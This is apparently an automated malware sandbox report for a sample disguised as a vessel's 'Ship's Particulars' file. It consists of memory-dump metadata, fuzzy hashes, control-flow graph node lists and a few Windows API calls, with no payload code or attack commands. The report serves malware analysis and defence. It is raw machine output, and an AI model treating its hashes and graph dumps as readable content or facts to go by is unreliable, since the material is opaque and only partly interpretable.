• Source File: 00000000.00000002.1823762941.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6c90000_MV BBG MUARA Ship's Particulars.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2694b209fa3818fa1e6d6be223909849203f12db8edddb4902b5b4c972a70a18
• Instruction ID: 301d1af1e99b9de67a23ca416e9a776a8bb71d7c13b38ba8e3286a726edd4d41
• Opcode Fuzzy Hash: 2694b209fa3818fa1e6d6be223909849203f12db8edddb4902b5b4c972a70a18
• Instruction Fuzzy Hash: 4CE11574E141198FDB54DFA9C5849AEFBF2BF89304F24C169D814AB355DB30A982CFA0
Memory Dump Source
• Source File: 00000000.00000002.1823762941.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6c90000_MV BBG MUARA Ship's Particulars.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 63f080eafdb04d405a6eef609f18f04426fb5c3546f867ef8a662277a282e12c
• Instruction ID: 68f982e4384d9a5b36216fa13ff24855415a6264005b2c223cf174fff5a6b245
• Opcode Fuzzy Hash: 63f080eafdb04d405a6eef609f18f04426fb5c3546f867ef8a662277a282e12c
• Instruction Fuzzy Hash: 3BE10774E141198FDB54DFA9C5849AEFBF2FF89304F248169E814AB355DB30A982CF60
Memory Dump Source
• Source File: 00000000.00000002.1819750029.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b50000_MV BBG MUARA Ship's Particulars.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1abea9065fbe7cfeb8fc1a793198411ed2c3e6721056cb56b1a291cab008ed74
• Instruction ID: 886e5089ced0d57baada8ec80db46be23cd00f43d944e2043bb1a38c0df86e99
• Opcode Fuzzy Hash: 1abea9065fbe7cfeb8fc1a793198411ed2c3e6721056cb56b1a291cab008ed74
• Instruction Fuzzy Hash: E2A13B32A00606CFCF05DFA5D8449AEB7F2FF85301B1585FAE905AB265EB71990ACB40
Memory Dump Source
• Source File: 00000000.00000002.1823762941.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6c90000_MV BBG MUARA Ship's Particulars.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8b6199075a5d11b1f56b17bfb92a19e899b1460b6b3e1f074756cd3d3b90b47f
• Instruction ID: f886dbd1eed29d5341d7254a44d3a23d1ee209c6198537cbf2e3ea8ba4645c06
• Opcode Fuzzy Hash: 8b6199075a5d11b1f56b17bfb92a19e899b1460b6b3e1f074756cd3d3b90b47f
• Instruction Fuzzy Hash: 23511B70E142198FDB54DFAAC5849AEFBF2BF89304F24C169D418A7355DB319A42CFA0

Execution Graph

Execution Coverage: 10.8%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 151
Total number of Limit Nodes: 16
execution_graph: serialized node/edge dump of the rendered execution graph (151 nodes, 16 limit nodes). Windows API calls appearing on the graph: CreateWindowExW, DuplicateHandle, GetModuleHandleW, GlobalMemoryStatusEx, CallWindowProcW, GetCurrentProcess, GetCurrentThread, GetCurrentThreadId.

Control-flow Graph

• Executed
• Not Executed
control_flow_graph: serialized basic-block/edge dump for the function at 6913060 (blocks 6913060 through 691386b; call sites at 691310e to 6913878 and 6913880).
Strings
Memory Dump Source
• Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
Similarity
• API ID:
• String ID: $fq$$fq$$fq$$fq$$fq$$fq
• API String ID: 0-1582559945
• Opcode ID: 13f80885f76db4bc77c71bebd43a673bfb9d12e0b1a6fe5ccb418db5fff68077
• Instruction ID: add91a4e578b83ff49ee9f710709c5b41c6353e4927155d5591ff88a6318e176
• Opcode Fuzzy Hash: 13f80885f76db4bc77c71bebd43a673bfb9d12e0b1a6fe5ccb418db5fff68077
• Instruction Fuzzy Hash: 65321035E1061ACFCB14EF75D99459DB7B6BFC9300F20C69AD419AB264EF30A985CB80

Control-flow Graph

• Executed
• Not Executed
control_flow_graph: serialized basic-block/edge dump for the function at 6917d80 (blocks 6917d80 through 69183c0; two call sites, at 6917fcf and 6918154, to 69165a0).
Strings
Memory Dump Source
• Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
Similarity
• API ID:
• String ID: $fq$$fq
• API String ID: 0-2537786760
• Opcode ID: dbd7cc43d44d1d26fec1736a03258eff12cbefa74a9c4ec856913d5a9604c59c
• Instruction ID: 089e4762957dddf7598f6382a7e4bc4d017e3ac0b1014e362af70971363b87c2
• Opcode Fuzzy Hash: dbd7cc43d44d1d26fec1736a03258eff12cbefa74a9c4ec856913d5a9604c59c
• Instruction Fuzzy Hash: 04028E31B0021A8FDB54DF68D6906AEB7F6EF84300F248929E815DB794DB75DD46CB80
Strings
Memory Dump Source
• Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
Similarity
• API ID:
• String ID: $
• API String ID: 0-3993045852
• Opcode ID: 798c4037c3b55aa9f7206231b0051564c9db80fb3f0dcdd02178da42a114e0a4
• Instruction ID: 2bb53f3e54d46aac32db02089087aa631aa3eb6dc0f25c479cbc4fd3897f6ba8
• Opcode Fuzzy Hash: 798c4037c3b55aa9f7206231b0051564c9db80fb3f0dcdd02178da42a114e0a4
• Instruction Fuzzy Hash: 4B229DB5E002198FDF60DBA8C5906AEB7B6EF84320F36846AD455AF794DB31DC41CB90
Memory Dump Source
• Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 3248bfca06167de08cf1f20a07798f2fc99b28bf90bd78d143dded2634866a0d
                                                                                                                  • Instruction ID: f2f3c4e913c741334d8ad7cd8e8a88631c22265f6c8bdbc237105e3a93606749
                                                                                                                  • Opcode Fuzzy Hash: 3248bfca06167de08cf1f20a07798f2fc99b28bf90bd78d143dded2634866a0d
                                                                                                                  • Instruction Fuzzy Hash: 3662AA34F002098FDB54DB68D994AADB7B6EF88310F248469E816EF795DB35ED41CB80
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: ddc0076973bfb754b23c329f69712c08c953a2eec7e06867d5e96fd180d94eb9
                                                                                                                  • Instruction ID: 70f817b827dc84b44fd72810e97cbf45d93bc96c60ea21adf6666e0a367cc1c1
                                                                                                                  • Opcode Fuzzy Hash: ddc0076973bfb754b23c329f69712c08c953a2eec7e06867d5e96fd180d94eb9
                                                                                                                  • Instruction Fuzzy Hash: DE326B35B00209CFDB54DB68D990BADB7B6FB88310F208929E515EB755DB38EC42CB91
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 6d4b875a6c0d09a4f77db7e51ab5761a31810f4578e404675c058251704c8600
                                                                                                                  • Instruction ID: 02977fa8b7f475a360a87fedefce6b11330de43bc5a50ccacc46742cd9e5e3ed
                                                                                                                  • Opcode Fuzzy Hash: 6d4b875a6c0d09a4f77db7e51ab5761a31810f4578e404675c058251704c8600
                                                                                                                  • Instruction Fuzzy Hash: 3D226D70E1010D8BEF64DBA8D5907ADB7BAEB45310F308926E455DB799CB34DC82CB91

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                   control_flow_graph 527 691ace0-691acfe 528 691ad00-691ad03 527->528 529 691ad05-691ad09 528->529 530 691ad14-691ad17 528->530 531 691af0c-691af16 529->531 532 691ad0f 529->532 533 691ad21-691ad24 530->533 534 691ad19-691ad1e 530->534 532->530 535 691ad26-691ad39 533->535 536 691ad3e-691ad41 533->536 534->533 535->536 537 691ad47-691ad4a 536->537 538 691aefd-691af06 536->538 540 691ad5a-691ad5d 537->540 541 691ad4c-691ad55 537->541 538->531 542 691ad5f-691ad68 538->542 540->542 543 691ad77-691ad7a 540->543 541->540 544 691af17-691af21 542->544 545 691ad6e-691ad72 542->545 546 691ad7c-691ad89 543->546 547 691ad8e-691ad91 543->547 552 691af23-691af2c 544->552 553 691aeac-691aeb2 544->553 545->543 546->547 548 691ad93-691adaf 547->548 549 691adb4-691adb6 547->549 548->549 554 691adb8 549->554 555 691adbd-691adc0 549->555 562 691af3e-691af4e 552->562 563 691af2e-691af3b 552->563 556 691aeb4 553->556 557 691aeb6-691aeb8 553->557 554->555 555->528 560 691adc6-691adea 555->560 561 691aec2-691aef3 556->561 557->561 576 691adf0-691adff 560->576 577 691aefa 560->577 561->577 566 691af50-691af53 562->566 563->562 568 691af60-691af63 566->568 569 691af55-691af59 566->569 570 691af70-691af73 568->570 571 691af65-691af6f 568->571 573 691af79-691afb4 569->573 574 691af5b 569->574 570->573 575 691b1dc-691b1df 570->575 582 691b1a7-691b1ba 573->582 583 691afba-691afc6 573->583 574->568 580 691b1e1 call 691b238 575->580 581 691b1ee-691b1f1 575->581 590 691ae01-691ae07 576->590 591 691ae17-691ae52 call 69165a0 576->591 577->538 593 691b1e7-691b1e9 580->593 586 691b1f3-691b20f 581->586 587 691b214-691b216 581->587 592 691b1bc 582->592 600 691afe6-691b02a 583->600 601 691afc8-691afe1 583->601 586->587 588 691b218 587->588 589 691b21d-691b220 587->589 588->589 589->566 595 691b226-691b230 589->595 597 691ae09 590->597 598 691ae0b-691ae0d 590->598 614 691ae54-691ae5a 591->614 615 691ae6a-691ae81 591->615 592->575 593->581 597->591 598->591 619 691b046-691b085 600->619 620 691b02c-691b03e 600->620 601->592 617 691ae5c 614->617 618 691ae5e-691ae60 614->618 625 691ae83-691ae89 615->625 626 691ae99-691aeaa 615->626 617->615 618->615 627 691b08b-691b166 call 69165a0 619->627 628 691b16c-691b181 619->628 620->619 631 691ae8b 625->631 632 691ae8d-691ae8f 625->632 626->553 626->561 627->628 628->582 631->626 632->626
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: $fq$$fq$$fq$$fq$$fq$$fq$$fq$$fq
                                                                                                                  • API String ID: 0-3929485403
                                                                                                                  • Opcode ID: f3da349b4b64ab379ac703fc249d9e007de8c330a55fa49b6495a4bf31b8ee7f
                                                                                                                  • Instruction ID: f093064db0bd54a7624f517bebdb57449f233d5c77e14fdd7f1f687cb5a3d50f
                                                                                                                  • Opcode Fuzzy Hash: f3da349b4b64ab379ac703fc249d9e007de8c330a55fa49b6495a4bf31b8ee7f
                                                                                                                  • Instruction Fuzzy Hash: 13E19D30F112098FDB55DFA8D9806AEB7B6EF85300F208929E815EF759DB309D46CB91

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                   control_flow_graph 783 691b658-691b67a 784 691b67c-691b67f 783->784 785 691b691-691b694 784->785 786 691b681 784->786 787 691b696-691b6f3 call 69165a0 785->787 788 691b6f8-691b6fb 785->788 789 691b689-691b68c 786->789 787->788 790 691b702-691b705 788->790 791 691b6fd-691b6ff 788->791 789->785 792 691b743-691b746 790->792 793 691b707-691b71c 790->793 791->790 796 691b750-691b753 792->796 797 691b748-691b74b 792->797 802 691b9f3-691ba2e 793->802 803 691b722-691b73e 793->803 800 691b755-691b759 796->800 801 691b76a-691b76d 796->801 797->796 800->802 804 691b75f-691b765 800->804 805 691b78a-691b78d 801->805 806 691b76f-691b778 801->806 817 691ba30-691ba33 802->817 803->792 804->801 809 691b7a0-691b7a3 805->809 810 691b78f-691b79b 805->810 806->802 808 691b77e-691b785 806->808 808->805 809->797 811 691b7a5-691b7a8 809->811 810->809 815 691b7aa-691b7ae 811->815 816 691b7bf-691b7c2 811->816 815->802 819 691b7b4-691b7ba 815->819 822 691b8e3-691b8ec 816->822 823 691b7c8-691b7cb 816->823 820 691ba35-691ba51 817->820 821 691ba56-691ba59 817->821 819->816 820->821 827 691bcc5-691bcc7 821->827 828 691ba5f-691ba87 821->828 822->806 829 691b8f2 822->829 824 691b7ed-691b7f0 823->824 825 691b7cd-691b7e8 823->825 834 691b800-691b803 824->834 835 691b7f2-691b7f5 824->835 825->824 832 691bcc9 827->832 833 691bcce-691bcd1 827->833 878 691ba91-691bad5 828->878 879 691ba89-691ba8c 828->879 830 691b8f7-691b8fa 829->830 836 691b904-691b907 830->836 837 691b8fc-691b901 830->837 832->833 833->817 842 691bcd7-691bce0 833->842 838 691b813-691b816 834->838 839 691b805-691b80e 834->839 844 691b9b2-691b9b5 835->844 845 691b7fb 835->845 846 691b909-691b90d 836->846 847 691b92a-691b92d 836->847 837->836 838->797 848 691b81c-691b81f 838->848 839->838 844->802 850 691b9b7-691b9be 844->850 845->834 846->802 852 691b913-691b923 846->852 855 691b93a-691b93d 847->855 856 691b92f-691b935 847->856 853 691b821-691b822 848->853 854 691b827-691b82a 848->854 857 691b9c3-691b9c6 850->857 873 691b959-691b95d 852->873 881 691b925 852->881 853->854 860 691b851-691b854 854->860 861 691b82c-691b830 854->861 862 691b954-691b957 855->862 863 691b93f-691b943 855->863 856->855 864 691b9d6-691b9d8 857->864 865 691b9c8-691b9cf 857->865 860->835 869 691b856-691b859 860->869 861->802 868 691b836-691b846 861->868 862->873 874 691b97e-691b981 862->874 863->802 870 691b949-691b94f 863->870 875 691b9da 864->875 876 691b9df-691b9e2 864->876 871 691b9d1 865->871 872 691b983-691b98c 865->872 868->846 895 691b84c 868->895 882 691b85b-691b877 869->882 883 691b87c-691b87f 869->883 870->862 871->864 880 691b991-691b994 872->880 873->802 884 691b963-691b973 873->884 874->872 874->880 875->876 876->784 877 691b9e8-691b9f2 876->877 906 691badb-691bae4 878->906 907 691bcba-691bcc4 878->907 879->842 887 691b9a4-691b9a7 880->887 888 691b996-691b99f 880->888 881->847 882->883 885 691b881-691b896 883->885 886 691b8be-691b8c1 883->886 884->797 897 691b979 884->897 885->802 902 691b89c-691b8b9 885->902 893 691b8c3-691b8c6 886->893 894 691b8cb-691b8ce 886->894 887->797 892 691b9ad-691b9b0 887->892 888->887 892->844 892->857 893->894 899 691b8d0-691b8d9 894->899 900 691b8de-691b8e1 894->900 895->860 897->874 899->900 900->822 900->830 902->886 908 691bcb0-691bcb5 906->908 909 691baea-691bb56 call 69165a0 906->909 908->907 917 691bc50-691bc65 909->917 918 691bb5c-691bb61 909->918 917->908 920 691bb63-691bb69 918->920 921 691bb7d 918->921 922 691bb6b-691bb6d 920->922 923 691bb6f-691bb71 920->923 924 691bb7f-691bb85 921->924 925 691bb7b 922->925 923->925 926 691bb87-691bb8d 924->926 927 691bb9a-691bba7 924->927 925->924 928 691bb93 926->928 929 691bc3b-691bc4a 926->929 934 691bba9-691bbaf 927->934 935 691bbbf-691bbcc 927->935 928->927 930 691bc02-691bc0f 928->930 931 691bbce-691bbdb 928->931 929->917 929->918 940 691bc11-691bc17 930->940 941 691bc27-691bc34 930->941 943 691bbf3-691bc00 931->943 944 691bbdd-691bbe3 931->944 936 691bbb1 934->936 937 691bbb3-691bbb5 934->937 935->929 936->935 937->935 945 691bc19 940->945 946 691bc1b-691bc1d 940->946 941->929 943->929 947 691bbe5 944->947 948 691bbe7-691bbe9 944->948 945->941 946->941 947->943 948->943
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: $fq$$fq$$fq$$fq$$fq$$fq
                                                                                                                  • API String ID: 0-1582559945
                                                                                                                  • Opcode ID: 9f0d9c23fe74c16bef5917cbecd98b744a777d39b33994ada943989a25d74f30
                                                                                                                  • Instruction ID: 15359e0248084f3e5cf55a350418169a43940dcc5ace6b5bc7ad300f7297fc94
                                                                                                                  • Opcode Fuzzy Hash: 9f0d9c23fe74c16bef5917cbecd98b744a777d39b33994ada943989a25d74f30
                                                                                                                  • Instruction Fuzzy Hash: 55025930E0020E8FDBA4DB68D5906ADB7B6FB45314F30896AE415DFA59DB34DC82CB91

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 951 6902872-6902907 GetCurrentProcess 955 6902910-6902944 GetCurrentThread 951->955 956 6902909-690290f 951->956 957 6902946-690294c 955->957 958 690294d-6902981 GetCurrentProcess 955->958 956->955 957->958 960 6902983-6902989 958->960 961 690298a-69029a2 958->961 960->961 974 69029a5 call 6902e38 961->974 975 69029a5 call 6902e28 961->975 976 69029a5 call 6902a48 961->976 964 69029ab-69029da GetCurrentThreadId 965 69029e3-6902a45 964->965 966 69029dc-69029e2 964->966 966->965 974->964 975->964 976->964
                                                                                                                  APIs
                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 069028F6
                                                                                                                  • GetCurrentThread.KERNEL32 ref: 06902933
                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 06902970
                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 069029C9
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4193123024.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6900000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Current$ProcessThread
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2063062207-0
                                                                                                                  • Opcode ID: b5bbb4ae6a89ff6415bd72f0c250991a237a7d48fdfb32fd9f6bb77d791be64f
                                                                                                                  • Instruction ID: 95a7a51bcfdad323773ebe3b9f2f6f9672f30835dd77063cfd5f03183f9b6c98
                                                                                                                  • Opcode Fuzzy Hash: b5bbb4ae6a89ff6415bd72f0c250991a237a7d48fdfb32fd9f6bb77d791be64f
                                                                                                                  • Instruction Fuzzy Hash: 7E5185B0900309CFDB54CFA9DA48BAEBBF5EF88314F20841AE519A73A0D7755984CF61

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 977 6902878-6902907 GetCurrentProcess 981 6902910-6902944 GetCurrentThread 977->981 982 6902909-690290f 977->982 983 6902946-690294c 981->983 984 690294d-6902981 GetCurrentProcess 981->984 982->981 983->984 986 6902983-6902989 984->986 987 690298a-69029a2 984->987 986->987 1000 69029a5 call 6902e38 987->1000 1001 69029a5 call 6902e28 987->1001 1002 69029a5 call 6902a48 987->1002 990 69029ab-69029da GetCurrentThreadId 991 69029e3-6902a45 990->991 992 69029dc-69029e2 990->992 992->991 1000->990 1001->990 1002->990
                                                                                                                  APIs
                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 069028F6
                                                                                                                  • GetCurrentThread.KERNEL32 ref: 06902933
                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 06902970
                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 069029C9
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4193123024.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6900000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Current$ProcessThread
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2063062207-0
                                                                                                                  • Opcode ID: 090f967679a40e675a6bf22b556bae785f20be49aa233978c34a9263a56cb745
                                                                                                                  • Instruction ID: 1ce1ad71a0e0339207d7deb995cc016146121235f8a17fc52c97921abbf5bec9
                                                                                                                  • Opcode Fuzzy Hash: 090f967679a40e675a6bf22b556bae785f20be49aa233978c34a9263a56cb745
                                                                                                                  • Instruction Fuzzy Hash: 515187B0900309CFDB54CFAADA48B9EBBF5EF88314F208419E519A73A0D7756984CF65

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1003 6919158-691917d 1004 691917f-6919182 1003->1004 1005 6919184-69191a3 1004->1005 1006 69191a8-69191ab 1004->1006 1005->1006 1007 69191b1-69191c6 1006->1007 1008 6919a6b-6919a6d 1006->1008 1015 69191c8-69191ce 1007->1015 1016 69191de-69191f4 1007->1016 1010 6919a74-6919a77 1008->1010 1011 6919a6f 1008->1011 1010->1004 1013 6919a7d-6919a87 1010->1013 1011->1010 1017 69191d0 1015->1017 1018 69191d2-69191d4 1015->1018 1020 69191ff-6919201 1016->1020 1017->1016 1018->1016 1021 6919203-6919209 1020->1021 1022 6919219-691928a 1020->1022 1023 691920b 1021->1023 1024 691920d-691920f 1021->1024 1033 69192b6-69192d2 1022->1033 1034 691928c-69192af 1022->1034 1023->1022 1024->1022 1039 69192d4-69192f7 1033->1039 1040 69192fe-6919319 1033->1040 1034->1033 1039->1040 1045 6919344-691935f 1040->1045 1046 691931b-691933d 1040->1046 1051 6919361-6919383 1045->1051 1052 691938a-6919394 1045->1052 1046->1045 1051->1052 1053 69193a4-691941e 1052->1053 1054 6919396-691939f 1052->1054 1060 6919420-691943e 1053->1060 1061 691946b-6919480 1053->1061 1054->1013 1065 6919440-691944f 1060->1065 1066 691945a-6919469 1060->1066 1061->1008 1065->1066 1066->1060 1066->1061
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: $fq$$fq$$fq$$fq
                                                                                                                  • API String ID: 0-2113499236
                                                                                                                  • Opcode ID: 2a7e2f9828c7fcc1cc624cf61d4568ba8bd63860a2a0e5aae86b3385e433a918
                                                                                                                  • Instruction ID: 9eba9586da37f4160ce9150e098a0dbd821982cce703041823c5c8a704c38ceb
                                                                                                                  • Opcode Fuzzy Hash: 2a7e2f9828c7fcc1cc624cf61d4568ba8bd63860a2a0e5aae86b3385e433a918
                                                                                                                  • Instruction Fuzzy Hash: 35915534F1021A8FDB54DF68D9A076E77F6BF85200F208569C819EB798EF309D468B91

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                   control_flow_graph 1069 691cf48-691cf63 1070 691cf65-691cf68 1069->1070 1071 691cfb1-691cfb4 1070->1071 1072 691cf6a-691cfac 1070->1072 1073 691cfd7-691cfda 1071->1073 1074 691cfb6-691cfd2 1071->1074 1072->1071 1075 691d023-691d026 1073->1075 1076 691cfdc-691d01e 1073->1076 1074->1073 1079 691d028-691d037 1075->1079 1080 691d06f-691d072 1075->1080 1076->1075 1085 691d046-691d052 1079->1085 1086 691d039-691d03e 1079->1086 1083 691d074-691d083 1080->1083 1084 691d0bb-691d0be 1080->1084 1087 691d092-691d09e 1083->1087 1088 691d085-691d08a 1083->1088 1089 691d0c0-691d102 1084->1089 1090 691d107-691d10a 1084->1090 1092 691d965-691d99e 1085->1092 1093 691d058-691d06a 1085->1093 1086->1085 1087->1092 1096 691d0a4-691d0b6 1087->1096 1088->1087 1089->1090 1097 691d110-691d113 1090->1097 1098 691d434-691d440 1090->1098 1107 691d9a0-691d9a3 1092->1107 1093->1080 1096->1084 1101 691d115-691d11a 1097->1101 1102 691d11d-691d120 1097->1102 1098->1079 1104 691d446-691d733 1098->1104 1101->1102 1109 691d122-691d124 1102->1109 1110 691d12f-691d132 1102->1110 1282 691d739-691d73f 1104->1282 1283 691d95a-691d964 1104->1283 1112 691d9a5-691d9c1 1107->1112 1113 691d9c6-691d9c9 1107->1113 1114 691d12a 1109->1114 1115 691d2ef-691d2f8 1109->1115 1116 691d134-691d176 1110->1116 1117 691d17b-691d17e 1110->1117 1112->1113 1125 691d9cb-691d9f7 1113->1125 1126 691d9fc-691d9ff 1113->1126 1114->1110 1119 691d307-691d313 1115->1119 1120 691d2fa-691d2ff 1115->1120 1116->1117 1123 691d180-691d1c2 1117->1123 1124 691d1c7-691d1ca 1117->1124 1131 691d424-691d429 1119->1131 1132 691d319-691d32d 1119->1132 1120->1119 1123->1124 1129 691d213-691d216 1124->1129 1130 691d1cc-691d20e 1124->1130 1125->1126 1135 691da01 call 691dabd 1126->1135 1136 691da0e-691da10 1126->1136 1140 691d218-691d25a 1129->1140 1141 691d25f-691d262 1129->1141 1130->1129 1157 691d431 1131->1157 1132->1157 1158 691d333-691d345 1132->1158 1143 691da07-691da09 1135->1143 1137 691da12 1136->1137 1138 691da17-691da1a 1136->1138 1137->1138 1138->1107 1146 691da1c-691da2b 1138->1146 1140->1141 1152 691d264-691d2a6 1141->1152 1153 691d2ab-691d2ae 1141->1153 1143->1136 1169 691da92-691daa7 1146->1169 1170 691da2d-691da90 call 69165a0 1146->1170 1152->1153 1154 691d2b0-691d2b2 1153->1154 1155 691d2bd-691d2c0 1153->1155 1154->1157 1164 691d2b8 1154->1164 1165 691d2c2-691d2d8 1155->1165 1166 691d2dd-691d2df 1155->1166 1157->1098 1182 691d347-691d34d 1158->1182 1183 691d369-691d36b 1158->1183 1164->1155 1165->1166 1171 691d2e1 1166->1171 1172 691d2e6-691d2e9 1166->1172 1196 691daa8 1169->1196 1170->1169 1171->1172 1172->1070 1172->1115 1188 691d351-691d35d 1182->1188 1189 691d34f 1182->1189 1187 691d375-691d381 1183->1187 1205 691d383-691d38d 1187->1205 1206 691d38f 1187->1206 1197 691d35f-691d367 1188->1197 1189->1197 1196->1196 1197->1187 1209 691d394-691d396 1205->1209 1206->1209 1209->1157 1213 691d39c-691d3b8 call 69165a0 1209->1213 1222 691d3c7-691d3d3 1213->1222 1223 691d3ba-691d3bf 1213->1223 1222->1131 1225 691d3d5-691d422 1222->1225 1223->1222 1225->1157 1284 691d741-691d746 1282->1284 1285 691d74e-691d757 1282->1285 1284->1285 1285->1092 1286 691d75d-691d770 1285->1286 1288 691d776-691d77c 1286->1288 1289 691d94a-691d954 1286->1289 1290 691d78b-691d794 1288->1290 1291 691d77e-691d783 1288->1291 1289->1282 1289->1283 1290->1092 1292 691d79a-691d7bb 1290->1292 1291->1290 1295 691d7ca-691d7d3 1292->1295 1296 691d7bd-691d7c2 1292->1296 1295->1092 1297 691d7d9-691d7f6 1295->1297 1296->1295 1297->1289 1300 691d7fc-691d802 1297->1300 1300->1092 1301 691d808-691d821 1300->1301 1303 691d827-691d84e 1301->1303 1304 691d93d-691d944 1301->1304 1303->1092 1307 691d854-691d85e 1303->1307 1304->1289 1304->1300 1307->1092 1308 691d864-691d87b 1307->1308 1310 691d88a-691d8a5 1308->1310 1311 691d87d-691d888 1308->1311 1310->1304 1316 691d8ab-691d8c4 call 69165a0 1310->1316 1311->1310 1320 691d8d3-691d8dc 1316->1320 1321 691d8c6-691d8cb 1316->1321 1320->1092 1322 691d8e2-691d936 1320->1322 1321->1320 1322->1304
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: $fq$$fq$$fq
                                                                                                                  • API String ID: 0-837900676
